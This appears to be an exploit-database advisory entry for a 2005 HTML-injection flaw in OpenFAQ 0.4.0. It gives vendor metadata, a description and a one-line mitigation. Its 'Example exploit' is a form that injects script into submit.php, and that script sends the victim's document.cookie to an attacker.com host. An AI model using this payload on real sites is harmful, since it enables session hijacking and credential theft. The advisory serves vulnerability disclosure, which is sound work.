vendor:
OpenFAQ
by:
SecurityFocus
6.4
CVSS
MEDIUM
HTML-injection
79
CWE
Product Name: OpenFAQ
Affected Version From: 0.4.0
Affected Version To: 0.4.0
Patch Exists: N/A
Related CWE: N/A
CPE: a:openfaq:openfaq:0.4.0
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005
OpenFAQ HTML-injection Vulnerability
OpenFAQ is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code would be executed in the context of the affected website, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible. Example exploit: <form action=http://host/openfaq-0.4.0/submit.php?ask=go method=post> <input type=text name=q value="<SCRIPT>document.location='http://attacker.com/get.cgi? value='+escape(document.cookie)</SCRIPT>"> <input type=hidden name=email> <input type=submit value=Submit> </form>
Mitigation:
Input validation should be used to ensure that user-supplied data is properly sanitized.
